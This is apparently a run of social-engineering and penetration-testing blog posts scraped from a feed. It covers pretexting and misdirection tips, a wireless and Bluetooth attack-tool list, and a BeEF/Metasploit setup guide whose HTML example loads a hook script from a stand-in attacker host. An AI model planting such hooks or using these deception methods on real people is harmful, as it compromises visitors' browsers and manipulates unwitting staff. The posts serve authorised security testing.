Last night (21st May 2013) was that special time again when I headed off to see a new offering from the master that is Derren Brown, this time wrapped up in his new stage show Infamous at the New Alexandra Theatre Birmingham. I should say two things before I continue, if you know me or you read this blog already you will know I am a little biased towards Mr Brown, I am a big fan of pretty much all he has done. Also as with all his shows, he does request no specific spoilers so everyone gets the full viewing experience.

Now I have seen everything Derren has done, both a combination on TV and in person. I love it all, the new stuff we see on TV lately is very different to the older stuff like Mind Control, but different isn’t bad, its well different. I think it aims to expose the viewer to different perspectives, as well as giving the people that participate a potentially life changing experience. However seeing Derren in anything live for me is really where you see him in top form, and Infamous really didn’t disappoint, and as much as I loved Enigma and Svengali I really appreciated Andy Nyman being back on the scene. I guess with that its no surprise I thought Infamous’s feel and production was more like the older shows “Something Wicked This Way Comes” and “An Evening of Wonders”, and for me this is much more how I like it. Essentially its Derren properly wowing us with himself, less props more mental mojo and dexterity.

This entire performance felt alot more personal, with Derren sharing what seemed some personal and emotional thoughts and experiences  as well as some very motivational take aways, all very inspiring indeed. The set background was very impressive, in some ways it was simplistic but really added to the effect and feel of the show. This show also included alot more audience participation that the last few which is awesome, and as I mentioned before you really get (in my mind) more first hand exposure to the processes and techniques that first made everyone aware of Derren’s skills all those years ago, as well as those opinions and experiences he has brought to TV of late. What you are constantly reminded of every time you see Derren is how much of a professional he is, hes ability to manage the audience, perfection in his presentation and skills, and also how personable he can be, but also a great sense of humour.

I know its abit vague (aka no spoilers), but when you go see this show you will not be disappointed  So many draw dropping moments, and even if you have an understanding for the techniques Derren employs (Hypnosis, Sleight of Hand, Mentalism, Sudo Psychic stuffs), I guarantee there will be many times where you think to yourself, how the hell did he just achieve that. Save the tracking back until later though, or you will miss more opportunities to be amazed. As always I left the show inspired even more to continue to develop both my skills, but also myself and others.

Enjoy the show, and as always leave comments.

]]> http://www.subliminalhacking.net/2013/05/22/derren-browns-infamous-tour-awesome-sauce/feed/ 0 http://www.subliminalhacking.net/2013/05/10/longlining-the-2013-social-engineering-threat/ http://www.subliminalhacking.net/2013/05/10/longlining-the-2013-social-engineering-threat/#comments Fri, 10 May 2013 12:23:01 +0000 Dale Pearson http://www.subliminalhacking.net/?p=1703 I came across another great InfoGraph today from proofpoint on “Longlining” and I thought I would share it. This approach uses more targeted phishing emails along with various techniques in an attempt to avoid detection. 

With all the power of the Interwebs understanding the individual or type of character is greatly reduced in effort, but to be successful it isnt just a case of reading a bio and job done. It really is important to take time to fully understand and visualise what it would be life for you to BE this character, as if you are to pull of the act successfully in a challenging situation you dont want to be pretending, you want to BE. This might seem odd, as of course you are you, and you are there on a Pentest or some other form of activity, but if you think like this and someone really challenges you on why you are doing something, you will get flustered, become unstuck, spill the beans and hand over your get out of jail free authorisation letter. However if you are acting out against your pretext the result would be different, you are not the Pentester, you are Bob the Head of Finance for ACME Inc, and when Bob is challenged from someone at reception, or any member of staff, he is not phased, as he would hope staff check people they are not familiar with, and would support it, but be very clear he is in a position of authority and should be treated accordingly.

A nice example of this is what happened to me on a physical engagement last year. The gig was going well, we had gained access to all but one of the objectives and was hunting around the facility to find its location. During the hunt we were approached and questioned by a facilities member of staff, they kindly asked what we were doing and what we were looking for. So I asked them when the location we were looking for was (You dont ask you dont get). As this was a semi sensitive location they were unsure and this was obvious, so I confirmed without his need to ask why we needed to go there and what had been doing. All of this information was part of our devised cover story and formed some background of the pretext. Then he decided it would be best to call the facilities manager. OH SHIT So now we crap ourselves and hand over the letter gig is up?? Nope. I encouraged him to call the guy, infact it would be good to meet him anyway, so he continued his call … “I have a couple of guys here who say they are X + Y and they need to go to Z”, few pauses, “OK I will take them there and you can meet us there? Sure. Sound good”. You might think this is crazy, but remember why wouldn’t we want to meet the manager if it was legitimate? Anyway, so the facilities guy who was very busy when we encountered him started to escort us through the building to our final objective and a meeting with the facilities manager. Cut a long story short, I had a good chat with him on route, shared some empathy around the mountain of work he seemed to have, and when we arrived at our location and the manager wasnt there, suggested we could wait here whilst he gets back to his work. He wasnt sure, I agreed might be best to wait with us, but I would understand if he needed to get back to it, and he did We waited about 2 mins, then went walkabout know knowing where our final objective was for later.

What I am trying to confirm above is that if you have done your homework, and are fully acting out on your pretext you can push the boundaries further until they crack. Sure you might eventually get untangled and rumbled but it gives you alot more wiggle room. You will probably be running on adrenalin at this stage, and in the mental oh shit, oh shit loop, but if you have your motivation right you just need to rely on your skills. Essentially you are misdirecting from the issue as hand, and manipulating the situation to give yourself some options.

Below is my tip list on putting together your pretext, but regardless have fun with it and experiment.

• Keep it simple. The more complex you make it, the more stress you put yourself under, and this will make things less fluid.
• Room to maneuver. Have multiple paths you can take with your pretext. If you have kids, who are they, interests, etc.
• Dont reinvent the wheel. Regardless of your age you have alot of life experience, include some of yourself in your pretext.
• BIG BECAUSE. Remember to have a logical reason for what you are doing. Having a reason goes a long way to implied acceptance.
• Visualise. Mentally go through possible character interactions. How will you respond, where will that lead.
• Accents. If you cant do them, DONT. If you accent doesn’t match your pretext, change it, or have justifiable reasoning why it doesn’t.
• Accessorise. If your character should have certain accessories or props, have them with you. It completes the picture and reduces doubt.
• Ad-lib. Be prepared to go off script if things get messy. However keep in context and reference to your pretext.
• Context is key. Use your OSINT to help formulate your pretext. If the company dont have water coolers, being the water cooler guy is FAIL.

I hope this information was of some interest, and will help you in your next authorised social engineering assessment.

With this in mind and the ever increasing usage of wireless technologies and a couple of requests from people I thought it would be a great idea to put together another recommendations list of tools, hardware and resources for anyone looking to get into wireless auditing or adding wireless attack vectors to their current attack methodology (similar to my OSINT  Tools Recommendations List).

This page will be maintained and grown over time, if you know of a good tool, decent hardware or resource please get it touch for consideration on adding it to this list.

Wireless Networks

• Aircrack-NG - Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.
• Kismet - Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
• inSSIDer - inSSIDer displays all the Wi-Fi networks around you – including security information, the strength of the network, and broadcasting channel.
• Airpwn - Airpwn listens to incoming wireless packets, and if the data matches a pattern specified in the config files, custom content is injected “spoofed”.
• CoWPAtty – WPA Dictionary Attacking Tool.
• Ettercap – Not wireless specific but a handy tool for Man In The Middle Attacking.
• ASLeap – Tool for exploiting Cisco LEAP authentication.
• FreeRadius - A patch for the popular open-source FreeRADIUS implementation to demonstrate RADIUS impersonation vulnerabilities
• Karmetasploit - Karmetasploit is a great function within Metasploit, allowing you to fake access points, capture passwords, harvest data, and conduct browser attacks against clients.
• EWSA – Elcomsoft Wireless Security Auditor allows GPU power to crack WPA.WPA2 password enabled networks.

• Alfa AWUS036H - 1000mW 1W 802.11b/g High Gain USB Wireless Long-Rang WiFi network Adapter with 5dBi Antenna.
• GlobalStat BU353 GPS – USB GPS Dongle compatible with Kismet. Ideal war mapping out wireless coverage.
• WiFi Pineapple - Awesome one box wonder of WiFi hacking goodness.
• Immunity Silica - Automated wireless auditing tool.
• AirPCAP - Wireless Packet Capture Solution.
• Edimax EW-7811Un – Nano USB Wifi Adapter that supports inject.

• BackTrack 5 Wireless Penetration Testing Beginner’s Guide - Great book on Wireless Pentesting with BackTrack by Vivek Ramachandran.
  
• Hacking Exposed Wireless, Second Edition – The Hacking Exposed books are well known, and this one features the sushi king Josh Wright.
• Wardriving with Kismet – Old blog post I did on WarDriving with Kismet, still a handy reference.
• Church of Wifi - WPA PSK Rainbow Tables

Bluetooth

• BlueSnarfer –  Provides the ability to send and receive AT Commands from GSM extensions.
• BlueBugger - Bluetooth tool to access phonebook, messages and other AT commands from supported GSM devices.
• CarWhisperer – Provides the ability to connect to BlueTooth devices with a class of handsfree and uses default passkeys to connect.

• Linksys Usbbt100 – Great moddable  BlueTooth dongle for hacking, not so easy to get hold of.
  
• MSI MS-6967 – Another BlueTooth dongle that supports modding for external antenna.
• Conceptronic CBT200U2 - Another BlueTooth dongle that supports modding for external antenna.
• Ubertooth One – The goto hardware for Bluetooth hacking and experimentation.

Zigbee

• KillerBee –  KillerBee is a Python based framework and tool set for exploring and exploiting the security of ZigBee and IEEE 802.15.4 networks.

• KisBee - Kisbee is a project to create a small, battery powered, open source hardware device for capturing 802.15.4 (aka Zigbee).
• AVR RZ Raven – Zigbee USB Wireless that works with the KillerBee Framework.

RFID

• Proxmark3 - The Proxmark III is the most powerful and versatile open source device currently available for performing RFID research.

What I am about to say may seem obvious, and in many ways it is, but when you are in the moment that awesome brain of yours goes primal and you forget the simple unless is something you have printed it in via establish learning and muscle memory, i.e. doing it lots and lots, so you dont need to think about it. Remember when you were learning to drive, the practice of approaching a roundabout, signalling, turning and changing gear resulted in a stalled vehicle and horns blaring all over the shop. This crap is impossible you though. Established learning now means you can do all of the above, speak on your mobile, check yourself out in the rearview mirror, smoke a cigarette whilst carefully resting a hot coffee between your legs.

I digress So this information is built from books I have read, but more importantly actually doing different things to prove they work and establish them as part of a built in skillset. Obviously on the job Social Engineering gigs give you this, but they are not always the best time to try them out, which is where my other past time of mentalism, hypnosis and more recently pickpocketing (all in the frame of entertainment) help and provides opportunity for me to learn and develop these skills.

People can be manipulated as there are two types of attention processed by the brain. There is ‘Top Down Attention’ and ‘Bottom Up Attention’.

• Top Down Attention is classified as decision making attention. If I ask you to look down at your hands now, you are consciously making a decision to perform that action. This action uses the Prefrontal Cortex which is highly developed in humans for complex decision making.
• Bottom Up Attention is when something grabs focus of your attention. A simple example of this is when someone calls your name, or a phone rings with your ringtone. You are drawn automatically to investigate and verify if you are the focus. This action uses a more primitive part of the brain known as the Sensory Cortices. In these regions of the brain unexpected stimulas are quickly routed in the brain to grab your focus, presumably to stop us being eaten by a lion back in the day

Combine this with the fact that our brains really do have limited focus, such as only being able to remember 5 or so concurrent activities at a time we create a situation, that even if you are aware of how its done you just cant protect against as its just how our brain functions. Combine this with congruency to build up some yes sets

So next time you are trying misdirect someones attention consider the above. When you ask ask someone for the time (Top Down Attention) drop a silver coin on the floor to roll away (Bottom Up Attention) creating a small window of opportunity that you can exploit to possibly gain access to that ID Badge, or view the combination codes written on that pad.

Happy Social Engineering!

The aim of Facebook graph as far as I can tell is to allow more powerful searching of all the juicy information that Facebook holds on their products, sorry I mean users. The theory being if you want to know a good restaurant in a certain area you can do a simple search query “Places people like to eat in London’ and it will respond with a load of recommendations based on the information / recommendations / likes of your friends, and their friends friends. The same can be done to check who of your friends or associates live in a certain area, have certain hobbies, work certain places and such like. The plan according to the video from the Facebook founder says it will just be early days and they will offer more over time with regards to search options. From looking at Facebook Graph I see the following options to search against:

My Friends, Photos of My Friends, Restaurants Nearby, Games My Friends Play, Music My Friends Like, Photos I have Liked, Groups My Friends Are In, Apps My Friends Use, Movies My Friends Like, Current Cities Of My Friends and so on.

I think this gives a little insight to some of the information available. The aim is to provide more personal intelligent information for users of Facebook and the results in theory should be more relevant than that of a search engine. Interestingly though, there is an option at the bottom to use the search query on the Internet, and this uses Microsofts Bing Search Engine.

So I think this service will help with further identify that circle of trust between people, common interests, favorite locations and alike. Some of this information is accessible today, but it can be like a needle in a hay stack, perhaps this makes that needle a little bigger No doubt there will be privacy configurations, but at the same time I cant help but think that those settings wouldn’t be able to restrict to much information, as without the information there is no product. Time will tell I guess, but certainly something worth following as it develops in my opinion.

If you have not heard of Facebook Graph check out the Facebook release info.
And if you are a developer, you might want to check out the Graph API.

This video shows you how you can integrate Metasploit into BeEF, and gives a quick example of exploiting a Windows XP SP3 box with Adobe 9 installed that is vulnerable to the Adobe CoolType Buffer Overflow Vulnerability (CVE-2010-2883).

Note: You will need Metasploit installed with some form of database support, such as postgres. This video does not show you how to install and configure metasploit and postgres.

Note: At the time of publishing this post not all modules are successfully autorunning. A ticket has been opened to request a fix and you can monitor the progress here.

Commands used:

lsb_release -a

sudo apt-get update

sudo apt-get install curl git ruby build-essential libsqlite3-ruby libsqlite3-dev libssl-dev

bash < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer )

sudo echo [[ -s "$HOME/.rvm/scripts/rvm" ]] && . “$HOME/.rvm/scripts/rvm” # Load RVM function’ >> ~/.bash_profile

rvm install ruby-1.9.2-p290

gem install bundler

git clone git://github.com/beefproject/beef.git

bundle install

nano config.yaml (in the root of the beef directory)

Helpful Hint – To enable the BeEF hook in your web page during an engagement add the hook script in before or after the body in your html file. Here is an example:

<html>
<body>
HOOK ME BABY ONE MORE TIME!!
</body>
<script src=”http://YOUR-IP-HERE:3000/hook.js”></script>
</html>